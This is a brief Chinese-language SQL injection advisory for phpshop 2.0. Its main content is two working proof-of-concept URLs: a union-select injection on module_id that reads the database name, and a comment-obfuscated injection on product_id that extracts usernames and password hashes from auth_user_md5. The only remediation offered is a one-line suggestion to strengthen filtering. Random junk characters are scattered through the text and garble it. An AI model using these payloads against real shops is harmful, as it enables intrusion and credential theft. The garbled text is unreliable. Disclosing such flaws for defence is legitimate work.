标题 : phpshop 2.0 SQL Injection Vulnerability
- y. j8 k6 r6 i: e9 R0 S9 ?9 d6 s8 r E* G
作者 : By onestree
8 |/ \; G0 q3 p% k5 {下载地址 : http://code.google.com/p/phpshop/downloads/list# O& Y8 U6 U) d7 e2 V
测试地址: windows 7 / ubuntu
3 |! T1 w! t* D8 l6 l# }: H! @
* d# Y/ _5 m! k/ ]6 \ 9 j& \' H0 N( R. k' x9 F
SQLi p0c:8 P' L0 U4 n) k; |- k( Y6 \* M
4 h6 G% d |+ ?==================; w4 p( x. O$ J, W4 n6 \
- P1 w+ N9 o) b5 T- e% c b2 {http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
1 S& m/ C! Z- Q" S5 `union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
: T" u6 N( m$ t, w& U3 X
8 R+ Q: @0 B, fhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
5 ^, L/ w7 [( \& }' r" p6 l2 d( x
# c$ ]$ b- n# _+ j修复:. X4 V }/ o# y# j6 u' y' l; I- ^; V
加强过滤
, Y9 _# S4 ?' C, A/ O3 n. N$ W$ m1 _; \: [
8 [( y8 C# `' I7 ~( e |